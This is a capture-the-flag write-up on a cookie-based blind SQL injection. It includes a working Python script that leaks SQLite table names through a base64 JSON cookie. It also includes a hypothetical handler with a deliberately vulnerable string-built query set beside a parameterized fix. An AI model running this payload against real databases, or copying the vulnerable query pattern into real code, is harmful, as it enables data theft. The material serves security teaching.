Sequel
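Brute-forcing the login gives the account guest/guest.
Three of them all showed "no node for guest", so it seemed privilege escalation was needed.
So I checked the cookies and found a strange-looking cookie:
In the end it turned out to be cookie injection: the password is brute-forced with blind injection through the cookie.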
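import requests
import base64
import string
import sys

out = ""  # characters recovered so far
# No exit condition: the loop runs until it is interrupted.
while True:
    for letter in string.printable:
        tmp = out + letter
        # JSON cookie body: the username field closes the quoted string and asks
        # whether sqlite_master holds a name matching the LIKE prefix.
        payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(
            tmp + '%')
        # The JSON is sent base64-encoded in the 1337_AUTH cookie.
        payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
        r = requests.get('http://9c61f34f-32c8-4eae-a49a-b9fa29a54546.node3.buuoj.cn/sequels',
                         cookies={"1337_AUTH": payload})
        # "Movie" in the response means the injected condition was true.
        if "Movie" in r.text:
            out = tmp
            sys.stdout.write(letter)
            sys.stdout.flush()
            break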
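
The write-up does not show the server side. As an added example (not the challenge's code), the following hypothetical handler decodes the same base64 JSON cookie and contrasts the string-built query that the payload implies with a parameterized one. The `users` table, the function names and the query text are assumptions, and the database is constructed in memory.

```python
import base64
import json
import sqlite3

def make_db():
    # Constructed in-memory database standing in for the SQLite backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('guest', 'guest')")
    return db

def make_cookie(username, password):
    # Same shape as the 1337_AUTH cookie in the write-up: base64(JSON).
    body = json.dumps({"username": username, "password": password})
    return base64.b64encode(body.encode("utf-8")).decode("ascii")

def decode_cookie(value):
    # Reject anything that is not strict base64 wrapping a JSON object
    # with string "username" and "password" fields.
    try:
        creds = json.loads(base64.b64decode(value, validate=True))
    except ValueError:  # covers binascii.Error and JSONDecodeError
        return None
    if not isinstance(creds, dict):
        return None
    user, pw = creds.get("username"), creds.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return None
    return user, pw

def login_vulnerable(db, cookie):
    creds = decode_cookie(cookie)
    if creds is None:
        return False
    # Assumed flaw: cookie fields are pasted into the SQL text inside double
    # quotes, so a quote in the username changes the structure of the query.
    sql = 'SELECT 1 FROM users WHERE username = "%s" AND password = "%s"' % creds
    return db.execute(sql).fetchone() is not None

def login_hardened(db, cookie):
    creds = decode_cookie(cookie)
    if creds is None:
        return False
    # Bound parameters are always treated as data, never as SQL syntax.
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, creds).fetchone() is not None
```

With the hardened handler the cookie value is only ever compared against stored usernames, so the response no longer depends on the truth of an injected condition.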